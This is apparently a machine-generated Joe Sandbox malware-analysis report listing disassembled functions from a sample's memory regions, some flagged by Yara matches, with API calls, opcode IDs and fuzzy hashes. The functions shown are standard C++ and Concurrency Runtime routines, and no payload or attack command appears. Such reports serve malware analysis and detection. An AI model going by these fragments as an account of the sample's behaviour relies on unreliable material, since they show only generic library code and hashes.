                                                                            • Instruction Fuzzy Hash: BE019A31990308EFDF00EFA8D550B9CBBB2BF48310F10812AD045AB281CB799A44CF91
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 02195B83
                                                                              • Part of subcall function 0219BDA4: __EH_prolog3_GS.LIBCMT ref: 0219BDAB
                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 02195BCE
                                                                            • __Getcoll.LIBCPMT ref: 02195BDD
                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02195BED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                            • String ID:
                                                                            • API String ID: 1836011271-0
                                                                            • Opcode ID: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                            • Instruction ID: 6970c411b675ab7ea45d9feb9992adea88f3e49b5270f31614911ca5341db505
                                                                            • Opcode Fuzzy Hash: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
                                                                            • Instruction Fuzzy Hash: BA019A71990309EFDF14EFA8D440B9CBBB2BF08315F10802AD046AB280CBB99A44CF90
                                                                            APIs
                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BEF9
                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Compare_exchange_acquire_4std::_
                                                                            • String ID:
                                                                            • API String ID: 3973403980-0
                                                                            • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                            • Instruction ID: 54cf5004022dc03f320fac5c152f4f5b0e5638c7bf5de93af177e0e0418c077f
                                                                            • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                            • Instruction Fuzzy Hash: 1901FB3744418DBBDF119E64DD428EE3B66EF08354B148516F918C4235C336CAB2EF89
                                                                            APIs
                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 021AC160
                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 021AC170
                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 021AC180
                                                                            • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 021AC194
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Compare_exchange_acquire_4std::_
                                                                            • String ID:
                                                                            • API String ID: 3973403980-0
                                                                            • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                            • Instruction ID: a812bf87bed85ce0d55bd3e5eed092db28eda5eb3513fe4c5e9d90bc2cc136fa
                                                                            • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                            • Instruction Fuzzy Hash: EF01B67E684249FBCF229F94DC518AE3B66AB65354F048423F92888070D732C671AFD5
                                                                            APIs
                                                                            • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110CB
                                                                              • Part of subcall function 0041093D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041095F
                                                                              • Part of subcall function 0041093D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410980
                                                                            • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110DE
                                                                            • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110EA
                                                                            • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004110F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                            • String ID:
                                                                            • API String ID: 4284812201-0
                                                                            • Opcode ID: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                            • Instruction ID: f673f10ca75d55ca35707f3ec936348daa0dfd556a05ba3ac72040e7cf752ef9
                                                                            • Opcode Fuzzy Hash: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
                                                                            • Instruction Fuzzy Hash: 2EF02470A002046BDF347BB648525EE35954F85318F04403FBA12AB7D1DEBC9DC6939D
                                                                            APIs
                                                                            • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413515
                                                                              • Part of subcall function 0041289F: ___crtGetTimeFormatEx.LIBCMT ref: 004128B5
                                                                              • Part of subcall function 0041289F: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128D4
                                                                            • GetLastError.KERNEL32 ref: 00413531
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413547
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00413555
                                                                              • Part of subcall function 00412675: SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                            • String ID:
                                                                            • API String ID: 1674182817-0
                                                                            • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                            • Instruction ID: 0599dc728a4d66ec5529e5430020c2b67b59d3184165c4d7970fdf63fa2ec416
                                                                            • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                            • Instruction Fuzzy Hash: 6AF08271A002253AD724BA765D07FFB369C9B01B54F90095BB905E6186F9ECD99042AC
                                                                            APIs
                                                                            • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 021A377C
                                                                              • Part of subcall function 021A2B06: ___crtGetTimeFormatEx.LIBCMT ref: 021A2B1C
                                                                              • Part of subcall function 021A2B06: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 021A2B3B
                                                                            • GetLastError.KERNEL32 ref: 021A3798
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A37AE
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A37BC
                                                                              • Part of subcall function 021A28DC: SetThreadPriority.KERNEL32(?,?), ref: 021A28E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                            • String ID:
                                                                            • API String ID: 1674182817-0
                                                                            • Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                            • Instruction ID: 231428c81e6cb77a4668dfe3263b4965d512b4888496b64916428e9174479a28
                                                                            • Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
                                                                            • Instruction Fuzzy Hash: 61F0A7B69803153EE720B7B55C1AFBB369C9B01750F500966B915E7080EBA9D4448AB4
                                                                            APIs
                                                                            • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 021A1332
                                                                              • Part of subcall function 021A0BA4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 021A0BC6
                                                                              • Part of subcall function 021A0BA4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 021A0BE7
                                                                            • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 021A1345
                                                                            • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 021A1351
                                                                            • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 021A135A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                            • String ID:
                                                                            • API String ID: 4284812201-0
                                                                            • Opcode ID: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                            • Instruction ID: bfd40afcba2cc29586aac184ddcc0d8759d6b499bdd03a50d8f6c49a69fd5309
                                                                            • Opcode Fuzzy Hash: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
                                                                            • Instruction Fuzzy Hash: 19F0BE796C07047F9F28BFB849706BE22974F85330F080129D515AB7C0DF719D01DAA4
                                                                            APIs
                                                                            • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 021AD078
                                                                            • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 021AD09C
                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 021AD0AF
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021AD0BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                            • String ID:
                                                                            • API String ID: 3657713681-0
                                                                            • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                            • Instruction ID: 25b648a510fdd37e1dcaec0df05347e03eed3036c3dc6d0dc4b832cf5488b55f
                                                                            • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                            • Instruction Fuzzy Hash: 1BF09E3D980A046BC724FB50F972D9EB77F8ED0F14721813AD80553582DB31A90ACBA2
                                                                            APIs
                                                                            • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 004125F8
                                                                            • GetLastError.KERNEL32(?,?,?,?,004185B9,?,?,?,?,00000000,?,00000000), ref: 00412607
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041261D
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041262B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                            • String ID:
                                                                            • API String ID: 3803302727-0
                                                                            • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                            • Instruction ID: 32cc1d4aaffc7e2d0c3ec5972b7dcb87793a3d4e5e2b79d3cb8e63f4c665dc5c
                                                                            • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                            • Instruction Fuzzy Hash: 2BF0A03460010ABBCF00EFA5DE45EEF37A86B00705F600616B611E20E1DBB8EA54976C
                                                                            APIs
                                                                            • std::_Cnd_initX.LIBCPMT ref: 02195A79
                                                                            • __Cnd_signal.LIBCPMT ref: 02195A85
                                                                            • std::_Cnd_initX.LIBCPMT ref: 02195A9A
                                                                            • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02195AA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                            • String ID:
                                                                            • API String ID: 2059591211-0
                                                                            • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                            • Instruction ID: 1a4604f4923eca19abbd1ef9abaaa5d77a15e2b75b9531f574cf1a02ecbbefd3
                                                                            • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                            • Instruction Fuzzy Hash: 92F0A036480701BFEF31BB31D81671A77B2AF00735F144418D04AA6890CF7AA8554E65
                                                                            APIs
                                                                            • RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 021A285F
                                                                            • GetLastError.KERNEL32(?,?,?,?,021A8820,?,?,?,?,00000000,?,00000000), ref: 021A286E
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A2884
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A2892
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                            • String ID:
                                                                            • API String ID: 3803302727-0
                                                                            • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                            • Instruction ID: e783ffff60a1705af99dac8b752cfee869c42203fc345ce2daf768a2df432bb8
                                                                            • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                                            • Instruction Fuzzy Hash: C7F0A938A4020ABBCF10EFA4CD44EAF37B8AB00B01F600620F914E20A0DB74D6049BA4
                                                                            APIs
                                                                            • ___crtCreateEventExW.LIBCPMT ref: 0041231C
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00410B29), ref: 0041232A
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412340
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041234E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                            • String ID:
                                                                            • API String ID: 200240550-0
                                                                            • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                            • Instruction ID: 1a74c5ccde1e3971b1c6c719148978c8dd05ce3529fe136f2ca3c66ce4c89eb0
                                                                            • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                            • Instruction Fuzzy Hash: 1DE0D8716002193AE714BB764D07FBF369C6B00B45F94082ABE14E11C3FDACD55041AC
                                                                            APIs
                                                                            • ___crtCreateEventExW.LIBCPMT ref: 021A2583
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,021A0D90), ref: 021A2591
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A25A7
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A25B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                            • String ID:
                                                                            • API String ID: 200240550-0
                                                                            • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                            • Instruction ID: 81db0d058135bfc8f27fdfb3d16b6f20c3cef252e0b6ef3c5799870ec1ea1f70
                                                                            • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                            • Instruction Fuzzy Hash: 7FE04F65A803192EEB10B7758C26FBB36ACAB00B45F940866FD58E50C2FBA9D50449A9
                                                                            APIs
                                                                              • Part of subcall function 004126E2: TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                            • TlsAlloc.KERNEL32(?,00410B29), ref: 0042396F
                                                                            • GetLastError.KERNEL32 ref: 00423981
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00423997
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004239A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                            • String ID:
                                                                            • API String ID: 3735082963-0
                                                                            • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                            • Instruction ID: 15d2e13c7ff80a83f5b64d05c829fbc6b4bb44007b15bdef03250d0b5d6306aa
                                                                            • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                            • Instruction Fuzzy Hash: 9BE02B749002146FC704BF76AC4A66E3374750134A7A00E3FB012D2192EEBCD1844A9C
                                                                            APIs
                                                                              • Part of subcall function 021A2949: TlsAlloc.KERNEL32(?,021A0D90), ref: 021A294F
                                                                            • TlsAlloc.KERNEL32(?,021A0D90), ref: 021B3BD6
                                                                            • GetLastError.KERNEL32 ref: 021B3BE8
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021B3BFE
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021B3C0C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                            • String ID:
                                                                            • API String ID: 3735082963-0
                                                                            • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                            • Instruction ID: 0b2b15ba35ef160658417f2ebad4c85fbec4609b7a7d054752f7af863b5b12e3
                                                                            • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                            • Instruction Fuzzy Hash: 1AE06838480315AFC715BFB59D49ABE32786E00B05B100E76E836D20A0EB34D0054E6C
                                                                            APIs
                                                                            • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412527
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412536
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041254C
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041255A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                            • String ID:
                                                                            • API String ID: 3016159387-0
                                                                            • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                            • Instruction ID: 385e35fad119ba3144d3df74fa1b3009f218c6b200c547ffcefd8a897afd490a
                                                                            • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                            • Instruction Fuzzy Hash: 95E04874600119BBC714EFB5DF49AEF73BC7A01745BA0046AA501E2151EAACDA44877D
                                                                            APIs
                                                                            • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,021A0D90), ref: 021A278E
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,021A0D90), ref: 021A279D
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A27B3
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A27C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                            • String ID:
                                                                            • API String ID: 3016159387-0
                                                                            • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                            • Instruction ID: 9a877adb6658afe3c0ec3de466f4a53011ac9537742868ba0701f3987e528603
                                                                            • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                            • Instruction Fuzzy Hash: 27E0867864020AABCB10FFF5DD49EAF77BC6E00B05F600465A905E3050EB78D7088B79
                                                                            APIs
                                                                            • SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                            • GetLastError.KERNEL32 ref: 0041268D
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126A3
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004126B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                            • String ID:
                                                                            • API String ID: 4286982218-0
                                                                            • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                            • Instruction ID: c34ca93974de366a1d33064525cfd34c096e82c6d40c10065bdc34e64e282c71
                                                                            • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                            • Instruction Fuzzy Hash: 08E04F7460011A6BCB14BF619D06BAF37AC6A00745B50082AB515D10A2EEB9D56486AC
                                                                            APIs
                                                                            • TlsSetValue.KERNEL32(?,00000000,00417961,00000000,?,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412747
                                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412753
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412769
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00412777
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                            • String ID:
                                                                            • API String ID: 1964976909-0
                                                                            • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                            • Instruction ID: adcf13394f918fecad39acecb2caa88bdbfd7867240310386255d15fa00e1845
                                                                            • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                            • Instruction Fuzzy Hash: ADE04F346001196BDB10BF619E09AAF77A86A00A45F50442AB515D10A2EEB9E564969C
                                                                            APIs
                                                                            • SetThreadPriority.KERNEL32(?,?), ref: 021A28E8
                                                                            • GetLastError.KERNEL32 ref: 021A28F4
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A290A
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A2918
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                            • String ID:
                                                                            • API String ID: 4286982218-0
                                                                            • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                            • Instruction ID: 89770dad4304a5717191157f7f981d998aacb0acc671e80bd81470328d0932c3
                                                                            • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                            • Instruction Fuzzy Hash: 43E08C3824021AABDF14BF61CC09FBF37ACBF00B45B504835FD29D20A0EB39D1049AA8
                                                                            APIs
                                                                            • TlsSetValue.KERNEL32(?,00000000,021A7BC8,00000000,?,?,021A0D90,?,?,?,00000000,?,00000000), ref: 021A29AE
                                                                            • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 021A29BA
                                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021A29D0
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 021A29DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
